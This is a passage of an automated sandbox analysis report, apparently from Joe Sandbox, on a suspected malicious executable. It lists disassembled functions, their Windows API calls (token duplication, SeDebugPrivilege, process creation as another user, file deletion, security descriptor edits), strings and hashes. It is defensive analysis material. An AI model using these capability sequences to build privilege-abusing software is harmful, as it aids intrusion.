                                                                                          • String ID: Shell_TrayWnd
                                                                                          • API String ID: 3778422247-2988720461
                                                                                          • Opcode ID: ec12ba9e870cc2e5dd85ad52799cb15a6745d125a488419c4f0ebb71fc1ee38e
                                                                                          • Instruction ID: 6108fbe056c1a000d5481f33e03d330ccc862392245923d3170deea12ea07584
                                                                                          • Opcode Fuzzy Hash: ec12ba9e870cc2e5dd85ad52799cb15a6745d125a488419c4f0ebb71fc1ee38e
                                                                                          • Instruction Fuzzy Hash: AC31A4712803157FE6245BA59D0EF7F3F9CEB48B51F10082EFA02EA1D1DAE458009B79
                                                                                          Function 004461ED Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 227processCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • _memset.LIBCMT ref: 0044621B
                                                                                          • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,?,?,?,?,?,?,?), ref: 00446277
                                                                                          • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0044628A
                                                                                          • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 004462A4
                                                                                          • GetProcessWindowStation.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 004462BD
                                                                                          • SetProcessWindowStation.USER32(00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004462C8
                                                                                          • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 004462E4
                                                                                          • _wcslen.LIBCMT ref: 0044639E
                                                                                            • Part of subcall function 0041171A: _malloc.LIBCMT ref: 00411734
                                                                                          • _wcsncpy.LIBCMT ref: 004463C7
                                                                                          • LoadUserProfileW.USERENV(?,00000000,00000000,?,?,00000000,?,?,?,?), ref: 004463E7
                                                                                          • CreateEnvironmentBlock.USERENV(?,?,00000000,00000000,?,?,00000000,?,?,?,?), ref: 00446408
                                                                                          • CreateProcessAsUserW.ADVAPI32(?,00000000,00000000,00000000,00000000,?,?,?,?,?,?,00000000,?,?,00000000,?), ref: 00446446
                                                                                          • UnloadUserProfile.USERENV(?,?,?,?,?,?,?), ref: 00446483
                                                                                          • CloseWindowStation.USER32(00000000,?,?,?,?), ref: 00446497
                                                                                          • CloseDesktop.USER32(00000000,?,?,?,?), ref: 0044649E
                                                                                          • SetProcessWindowStation.USER32(?,?,?,?,?), ref: 004464A9
                                                                                          • CloseHandle.KERNEL32(?,?,?,?,?), ref: 004464B4
                                                                                          • DestroyEnvironmentBlock.USERENV(?,?,?,?,?,?), ref: 004464C8
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: StationWindow$CloseProcess$User$BlockCreateDesktopEnvironmentHandleOpenProfile$DestroyDuplicateLoadTokenUnload_malloc_memset_wcslen_wcsncpy
                                                                                          • String ID: $default$winsta0
                                                                                          • API String ID: 2173856841-1027155976
                                                                                          • Opcode ID: 46fbf0c91f7472a5aacc8247470ef491aaba77adfafaecf219e6b528db50d2b4
                                                                                          • Instruction ID: eafd5d154f9bcf2590b8f8eb1e0f3d39b01f77f2fd200ee1cb9c7344d9c52646
                                                                                          • Opcode Fuzzy Hash: 46fbf0c91f7472a5aacc8247470ef491aaba77adfafaecf219e6b528db50d2b4
                                                                                          • Instruction Fuzzy Hash: DD819170208341AFE724DF65C848B6FBBE8AF89744F04491DF69097291DBB8D805CB6B
                                                                                          Function 0044BD29 Relevance: 31.7, APIs: 17, Strings: 1, Instructions: 178filestringCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                            • Part of subcall function 0040FFB0: GetFullPathNameW.KERNEL32(00000000,00000104,C:\Users\user\Desktop\XhAQ0Rk63O.exe,?,C:\Users\user\Desktop\XhAQ0Rk63O.exe,004A8E80,C:\Users\user\Desktop\XhAQ0Rk63O.exe,0040F3D2), ref: 0040FFCA
                                                                                            • Part of subcall function 00436A1D: __wsplitpath.LIBCMT ref: 00436A45
                                                                                            • Part of subcall function 00436A1D: __wsplitpath.LIBCMT ref: 00436A6C
                                                                                            • Part of subcall function 00436A1D: __wcsicoll.LIBCMT ref: 00436A93
                                                                                            • Part of subcall function 00436AC4: GetFileAttributesW.KERNEL32(?,0044BD82,?,?,?), ref: 00436AC9
                                                                                          • _wcscat.LIBCMT ref: 0044BD96
                                                                                          • _wcscat.LIBCMT ref: 0044BDBF
                                                                                          • __wsplitpath.LIBCMT ref: 0044BDEC
                                                                                          • FindFirstFileW.KERNEL32(?,?), ref: 0044BE04
                                                                                          • _wcscpy.LIBCMT ref: 0044BE73
                                                                                          • _wcscat.LIBCMT ref: 0044BE85
                                                                                          • _wcscat.LIBCMT ref: 0044BE97
                                                                                          • lstrcmpiW.KERNEL32(?,?), ref: 0044BEC3
                                                                                          • DeleteFileW.KERNEL32(?), ref: 0044BED5
                                                                                          • MoveFileW.KERNEL32(?,?), ref: 0044BEF5
                                                                                          • CopyFileW.KERNEL32(?,?,00000000), ref: 0044BF0C
                                                                                          • DeleteFileW.KERNEL32(?), ref: 0044BF17
                                                                                          • CopyFileW.KERNEL32(?,?,00000000), ref: 0044BF2E
                                                                                          • FindClose.KERNEL32(00000000), ref: 0044BF35
                                                                                          • MoveFileW.KERNEL32(?,?), ref: 0044BF51
                                                                                          • FindNextFileW.KERNEL32(00000000,00000010), ref: 0044BF66
                                                                                          • FindClose.KERNEL32(00000000), ref: 0044BF7E
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: File$Find_wcscat$__wsplitpath$CloseCopyDeleteMove$AttributesFirstFullNameNextPath__wcsicoll_wcscpylstrcmpi
                                                                                          • String ID: \*.*
                                                                                          • API String ID: 2188072990-1173974218
                                                                                          • Opcode ID: 37b83e77465c63a9a0fc5a2f65b261a2e9867c78515d1bc57cb11e6e3b171851
                                                                                          • Instruction ID: 14f7055b3521afb04026f42b490306401b0ba37f80ed0ea0ca267746d8cc4687
                                                                                          • Opcode Fuzzy Hash: 37b83e77465c63a9a0fc5a2f65b261a2e9867c78515d1bc57cb11e6e3b171851
                                                                                          • Instruction Fuzzy Hash: CA5166B2008344AAD720DBA4DC44FDF73E8AB85314F448D1EF68982141EB79D64CCBAA
                                                                                          Function 0042039F Relevance: 30.0, APIs: 16, Strings: 1, Instructions: 282timeCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • __invoke_watson.LIBCMT ref: 004203A4
                                                                                            • Part of subcall function 00417D93: _memset.LIBCMT ref: 00417DBB
                                                                                            • Part of subcall function 00417D93: IsDebuggerPresent.KERNEL32(?,?,00000314), ref: 00417E6F
                                                                                            • Part of subcall function 00417D93: SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,00000314), ref: 00417E79
                                                                                            • Part of subcall function 00417D93: UnhandledExceptionFilter.KERNEL32(?,?,?,00000314), ref: 00417E86
                                                                                            • Part of subcall function 00417D93: GetCurrentProcess.KERNEL32(C0000417,?,?,00000314), ref: 00417EA1
                                                                                            • Part of subcall function 00417D93: TerminateProcess.KERNEL32(00000000,?,?,00000314), ref: 00417EA8
                                                                                          • __get_daylight.LIBCMT ref: 004203B0
                                                                                          • __invoke_watson.LIBCMT ref: 004203BF
                                                                                          • __get_daylight.LIBCMT ref: 004203CB
                                                                                          • __invoke_watson.LIBCMT ref: 004203DA
                                                                                          • ____lc_codepage_func.LIBCMT ref: 004203E2
                                                                                          • _strlen.LIBCMT ref: 00420442
                                                                                          • __malloc_crt.LIBCMT ref: 00420449
                                                                                          • _strlen.LIBCMT ref: 0042045F
                                                                                          • _strcpy_s.LIBCMT ref: 0042046D
                                                                                          • __invoke_watson.LIBCMT ref: 00420482
                                                                                          • GetTimeZoneInformation.KERNEL32(00496C28), ref: 004204AA
                                                                                          • WideCharToMultiByte.KERNEL32(?,?,00496C2C,?,?,0000003F,?,?), ref: 00420528
                                                                                          • WideCharToMultiByte.KERNEL32(?,?,00496C80,000000FF,?,0000003F,?,?,?,00496C2C,?,?,0000003F,?,?), ref: 0042055C
                                                                                            • Part of subcall function 00413A88: __lock.LIBCMT ref: 00413AA6
                                                                                            • Part of subcall function 00413A88: ___sbh_find_block.LIBCMT ref: 00413AB1
                                                                                            • Part of subcall function 00413A88: ___sbh_free_block.LIBCMT ref: 00413AC0
                                                                                            • Part of subcall function 00413A88: RtlFreeHeap.NTDLL(00000000,00411739,0048C758,0000000C,004183E8,00000000,0048CA38,0000000C,00418422,00411739,?,?,004224D3,00000004,0048CCA0,0000000C), ref: 00413AF0
                                                                                            • Part of subcall function 00413A88: GetLastError.KERNEL32(?,004224D3,00000004,0048CCA0,0000000C,00417011,00411739,?,00000000,00000000,00000000,?,00416C24,00000001,00000214), ref: 00413B01
                                                                                          • __invoke_watson.LIBCMT ref: 004205CC
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: __invoke_watson$ByteCharExceptionFilterMultiProcessUnhandledWide__get_daylight_strlen$CurrentDebuggerErrorFreeHeapInformationLastPresentTerminateTimeZone____lc_codepage_func___sbh_find_block___sbh_free_block__lock__malloc_crt_memset_strcpy_s
                                                                                          • String ID: S\
                                                                                          • API String ID: 4084823496-393906132
                                                                                          • Opcode ID: dc5610741a0148f7786b6b9dfa96f50a6ae589fbdbcd52e429fe3139d0279a48
                                                                                          • Instruction ID: b357f19af7064e56bcdb8625987f67de7edc2332d57e558cb2e7b84f91b73af7
                                                                                          • Opcode Fuzzy Hash: dc5610741a0148f7786b6b9dfa96f50a6ae589fbdbcd52e429fe3139d0279a48
                                                                                          • Instruction Fuzzy Hash: 6A91D371E00125AFDB20EF65EC819AE7BE9EF55300B95003BF540A7253DA3C89828F5C
                                                                                          Function 00434D50 Relevance: 29.9, APIs: 14, Strings: 3, Instructions: 114fileCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00434D75
                                                                                          • __swprintf.LIBCMT ref: 00434D91
                                                                                          • _wcslen.LIBCMT ref: 00434D9B
                                                                                          • _wcslen.LIBCMT ref: 00434DB0
                                                                                          • _wcslen.LIBCMT ref: 00434DC5
                                                                                          • CreateDirectoryW.KERNEL32(?,00000000), ref: 00434DD7
                                                                                          • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 00434E0A
                                                                                          • _memset.LIBCMT ref: 00434E27
                                                                                          • _wcslen.LIBCMT ref: 00434E3C
                                                                                          • _wcsncpy.LIBCMT ref: 00434E6F
                                                                                          • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 00434EA9
                                                                                          • CloseHandle.KERNEL32(00000000), ref: 00434EB4
                                                                                          • RemoveDirectoryW.KERNEL32(?), ref: 00434EBB
                                                                                          • CloseHandle.KERNEL32(00000000), ref: 00434ECE
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: _wcslen$CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
                                                                                          • String ID: :$\$\??\%s
                                                                                          • API String ID: 302090198-3457252023
                                                                                          • Opcode ID: 1623bec2b974bb3ee5261838648fb58b2a9d6db5aa255760d49714c370e47f4e
                                                                                          • Instruction ID: 730b2dca1b6b09bd6b76555d3316dee95f4818bcffb97f26f8f03165767cfd2f
                                                                                          • Opcode Fuzzy Hash: 1623bec2b974bb3ee5261838648fb58b2a9d6db5aa255760d49714c370e47f4e
                                                                                          • Instruction Fuzzy Hash: 30416676604340ABE330EB64DC49FEF73E8AFD8714F00891EF649921D1E7B4A645876A
                                                                                          Function 00464422 Relevance: 28.2, APIs: 15, Strings: 1, Instructions: 193threadCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                            • Part of subcall function 00444233: _wcslen.LIBCMT ref: 0044424E
                                                                                          • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0046449E
                                                                                          • GetLastError.KERNEL32 ref: 004644B4
                                                                                          • GetCurrentThread.KERNEL32 ref: 004644C8
                                                                                          • OpenThreadToken.ADVAPI32(00000000), ref: 004644CF
                                                                                          • GetCurrentProcess.KERNEL32(00000028,?), ref: 004644E0
                                                                                          • OpenProcessToken.ADVAPI32(00000000), ref: 004644E7
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: OpenProcess$CurrentThreadToken$ErrorLast_wcslen
                                                                                          • String ID: SeDebugPrivilege
                                                                                          • API String ID: 1312810259-2896544425
                                                                                          • Opcode ID: bb2abcbadcb50e0008f3b1fe3e217bfa736f6ade076d8095da49bf04f95d98f8
                                                                                          • Instruction ID: c3f5e6af55eb0da9fa74db60d4f5a84adac3a89a74612fbe59a223ef38337450
                                                                                          • Opcode Fuzzy Hash: bb2abcbadcb50e0008f3b1fe3e217bfa736f6ade076d8095da49bf04f95d98f8
                                                                                          • Instruction Fuzzy Hash: 0E51A171200201AFD710DF65DD85F5BB7A8AB84704F10892EFB44DB2C1D7B8E844CBAA
                                                                                          Function 004037E0 Relevance: 24.9, APIs: 10, Strings: 4, Instructions: 359COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                            • Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71
                                                                                          • GetCurrentDirectoryW.KERNEL32(00000104,?,?), ref: 00403871
                                                                                          • GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00403887
                                                                                          • __wsplitpath.LIBCMT ref: 004038B2
                                                                                            • Part of subcall function 00413DB0: __wsplitpath_helper.LIBCMT ref: 00413DF2
                                                                                          • _wcscpy.LIBCMT ref: 004038C7
                                                                                          • _wcscat.LIBCMT ref: 004038DC
                                                                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 004038EC
                                                                                            • Part of subcall function 0041171A: _malloc.LIBCMT ref: 00411734
                                                                                            • Part of subcall function 0041171A: std::bad_alloc::bad_alloc.LIBCMT ref: 00411757
                                                                                            • Part of subcall function 0041171A: std::bad_exception::bad_exception.LIBCMT ref: 0041176B
                                                                                            • Part of subcall function 0041171A: __CxxThrowException@8.LIBCMT ref: 00411779
                                                                                            • Part of subcall function 00403F40: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,?,?,0040397D,?,?,00000010), ref: 00403F54
                                                                                            • Part of subcall function 00403F40: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,00000000,?,00000010), ref: 00403F8B
                                                                                          • _wcscpy.LIBCMT ref: 004039C2
                                                                                          • _wcslen.LIBCMT ref: 00403A53
                                                                                          • _wcslen.LIBCMT ref: 00403AAA
                                                                                          Strings
                                                                                          • _, xrefs: 00403B48
                                                                                          • #include depth exceeded. Make sure there are no recursive includes, xrefs: 0042B87B
                                                                                          • Error opening the file, xrefs: 0042B8AC
                                                                                          • Unterminated string, xrefs: 0042B9BA
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: _wcslen$ByteCharCurrentDirectoryMultiWide_wcscpy$Exception@8FullNamePathThrow__wsplitpath__wsplitpath_helper_malloc_wcscatstd::bad_alloc::bad_allocstd::bad_exception::bad_exception
                                                                                          • String ID: #include depth exceeded. Make sure there are no recursive includes$Error opening the file$Unterminated string$_
                                                                                          • API String ID: 4115725249-188983378
                                                                                          • Opcode ID: 03e6ea20781e53ba093b2e4e1cf17e7e885813b4a055a64ca381d3f5bd1a9c3d
                                                                                          • Instruction ID: dca64db042171ec5605b2d10b6a92a42a2076cc25022adee7b8115af8a15fc96
                                                                                          • Opcode Fuzzy Hash: 03e6ea20781e53ba093b2e4e1cf17e7e885813b4a055a64ca381d3f5bd1a9c3d
                                                                                          • Instruction Fuzzy Hash: 16D1D5B15083019AD710EF65C841AEB77E8AF95308F04492FF5C563292DB78DA49C7AB
                                                                                          Function 00434BEE Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 139fileCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • FindFirstFileW.KERNEL32(?,?), ref: 00434C12
                                                                                          • GetFileAttributesW.KERNEL32(?), ref: 00434C4F
                                                                                          • SetFileAttributesW.KERNEL32(?,?), ref: 00434C65
                                                                                          • FindNextFileW.KERNEL32(00000000,?), ref: 00434C77
                                                                                          • FindClose.KERNEL32(00000000), ref: 00434C88
                                                                                          • FindClose.KERNEL32(00000000), ref: 00434C9C
                                                                                          • FindFirstFileW.KERNEL32(*.*,?), ref: 00434CB7
                                                                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 00434CFE
                                                                                          • SetCurrentDirectoryW.KERNEL32(0048A090), ref: 00434D22
                                                                                          • FindNextFileW.KERNEL32(00000000,00000010), ref: 00434D2A
                                                                                          • FindClose.KERNEL32(00000000), ref: 00434D35
                                                                                          • FindClose.KERNEL32(00000000), ref: 00434D43
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
                                                                                          • String ID: *.*
                                                                                          • API String ID: 1409584000-438819550
                                                                                          • Opcode ID: 55a9fa3bdb603958be151e0ad833d8004315071fb05557dfda8e1c4e562a15c1
                                                                                          • Instruction ID: 399dbb17912f16e5170155dcc5475d9346bc7ba5aa4a4c8a0ea4d4714b2c7a66
                                                                                          • Opcode Fuzzy Hash: 55a9fa3bdb603958be151e0ad833d8004315071fb05557dfda8e1c4e562a15c1
                                                                                          • Instruction Fuzzy Hash: 4141D8726042086BD710EF64DC45AEFB3A8AAC9311F14592FFD54C3280EB79E915C7B9
                                                                                          Function 00444078 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 94timesleepCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: Timetime$Sleep
                                                                                          • String ID: BUTTON
                                                                                          • API String ID: 4176159691-3405671355
                                                                                          • Opcode ID: c9fcf2e0d9fa6a0073e84c27d550d5c6e5d49d4b0adb2218bf3fff485548fdb5
                                                                                          • Instruction ID: 32c89cc89acb3c111fc3cc5f781edb0c57d51ec263d79eeef99f8852f1a29925
                                                                                          • Opcode Fuzzy Hash: c9fcf2e0d9fa6a0073e84c27d550d5c6e5d49d4b0adb2218bf3fff485548fdb5
                                                                                          • Instruction Fuzzy Hash: CB21B7723843016BE330DB74FD4DF5A7B94A7A5B51F244876F600E6290D7A5D442876C
                                                                                          Function 00445DD3 Relevance: 18.2, APIs: 12, Instructions: 179COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                            • Part of subcall function 004392BC: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 004392DE
                                                                                            • Part of subcall function 004392BC: GetLastError.KERNEL32 ref: 004392E4
                                                                                            • Part of subcall function 004392BC: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 0043930B
                                                                                            • Part of subcall function 0043928B: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004392A5
                                                                                          • GetSecurityDescriptorDacl.ADVAPI32(?,00000004,?,?,?,?), ref: 00445E4B
                                                                                          • _memset.LIBCMT ref: 00445E61
                                                                                          • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00445E83
                                                                                          • GetLengthSid.ADVAPI32(?), ref: 00445E92
                                                                                          • GetAce.ADVAPI32(?,00000000,?,?,00000018), ref: 00445EDE
                                                                                          • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00445EFB
                                                                                          • GetLengthSid.ADVAPI32(?,?,00000018), ref: 00445F11
                                                                                          • GetLengthSid.ADVAPI32(?,00000008,?,?,00000000,?,00000000), ref: 00445F39
                                                                                          • CopySid.ADVAPI32(00000000,?,00000000,?,00000000), ref: 00445F40
                                                                                          • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?,?,00000000,?,00000000), ref: 00445F6E
                                                                                          • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000,?,00000000,?,00000000), ref: 00445F8B
                                                                                          • SetUserObjectSecurity.USER32(?,?,?), ref: 00445FA0
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: Security$DescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                                                          • String ID:
                                                                                          • API String ID: 3490752873-0
                                                                                          • Opcode ID: b11fc48791dee11005ef1ac308328aec1e94b5ee495351b15ab77ecbbd68b2cc
                                                                                          • Instruction ID: 491154c1e478dcf6c9ac3cbca3c2c9e2645d4ee7bbdc2abf5fae4ada557f6fe4
                                                                                          • Opcode Fuzzy Hash: b11fc48791dee11005ef1ac308328aec1e94b5ee495351b15ab77ecbbd68b2cc
                                                                                          • Instruction Fuzzy Hash: 85519D71108301ABD610DF61CD84E6FB7E9AFC9B04F04491EFA869B242D778E909C76B
                                                                                          Function 0047A999 Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 288comCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • OleInitialize.OLE32(00000000), ref: 0047AA03
                                                                                          • CLSIDFromProgID.OLE32(00000000,?), ref: 0047AA27
                                                                                          • CoCreateInstance.OLE32(?,00000000,00000005,004829C0,?), ref: 0047AAAA
                                                                                          • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000), ref: 0047AB6B
                                                                                          • _memset.LIBCMT ref: 0047AB7C
                                                                                          • _wcslen.LIBCMT ref: 0047AC68
                                                                                          • _memset.LIBCMT ref: 0047ACCD
                                                                                          • CoCreateInstanceEx.OLE32 ref: 0047AD06
                                                                                          • CoSetProxyBlanket.OLE32(004829D0,?,?,?,?,?,?,00000800), ref: 0047AD53
                                                                                          Strings
                                                                                          • NULL Pointer assignment, xrefs: 0047AD84
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
